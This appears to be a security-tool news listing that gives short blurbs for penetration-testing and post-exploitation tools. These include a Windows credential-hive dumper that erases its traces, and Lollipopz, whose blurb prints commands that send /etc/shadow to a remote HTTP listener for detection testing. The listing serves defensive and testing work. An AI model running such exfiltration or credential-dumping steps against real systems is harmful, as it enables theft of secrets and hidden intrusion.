Kali Linux 2020.2 Release – Penetration Testing and Ethical Hacking Linux Distribution

We are incredibly excited to announce the second release of 2020, Kali Linux 2020.1.2A quick overview of what’s new since January: KDE Plasma Makeover & Login PowerShell by Default. Kind of. Kali on ARM Improvements Lessons From The Installer Changes New Key Packages & Icons Behind the Scenes, Infrastructure Improvements KDE Plasma Makeover & LoginRead More

HiveJack – This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host

This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM, SECURITY and SAM registry hives and once copied to the attacker machines provides an option to delete these files to clear the trace.Often, this is a repetitive process, once an attacker getsRead More

Invoker – Penetration Testing Utility

Penetration testing utility.The goal is to use this tool when access to some Windows OS features through GUI is restricted.Some features require administrative privileges.Capabilities: invoke the Command Prompt and PowerShell, download a file, schedule a task, add a registry key, connect to a remote host, list unquoted service paths and restart a running service, terminateRead More

Lollipopz – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80Read More

One-Lin3r v2.1 – Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won’t even need to copy the one-liners). Screenshots It consists ofRead More

InQL Scanner – A Burp Extension For GraphQL Security Testing

A security testing tool to facilitate GraphQL technology security auditing efforts. InQL can be used as a stand-alone script, or as a Burp Suite extension.InQL Stand-AloneRunning inql from Python will issue an Introspection query to the target GraphQL endpoint in order fetch metadata information for: Queries, mutations, subscriptions Its fields and arguments Objects and customRead More

Astra – Automated Security Testing For REST API’s

REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API),Read More

Pentest Tools Framework – A Database Of Exploits, Scanners And Tools For Penetration Testing

Pentest Tools Framework is a database of exploits, Scanners and tools for penetration testing. Pentest is a powerful framework includes a lot of tools for beginners. You can explore kernel vulnerabilities, network vulnerabilities.NEWS Modules PTF UPDATE PTF OPtions ————————————————————————————- | Global Option | ————————————————————————————- | Command Description | |———————————————————————————–| | show modules | Look thisRead More

Proton Framework – A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework

About Proton Framework Proton Framework is a Windows post exploitation framework similar to other penetration testing tools such as Meterpreter and Powershell Invader Framework. The major difference is that the Proton Framework does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of WindowsRead More

Aduket – Straight-forward HTTP Client Testing, Assertions Included

Straight-forward HTTP client testing, assertions included! Simple httptest.Server wrapper with a little request recorder spice on it. No special DSL, no complex API to learn. Just create a server and fire your request like an Hadouken then assert them. TODO Add example usages Add docs Add response headers to NewServer Add request header assertions AddRead More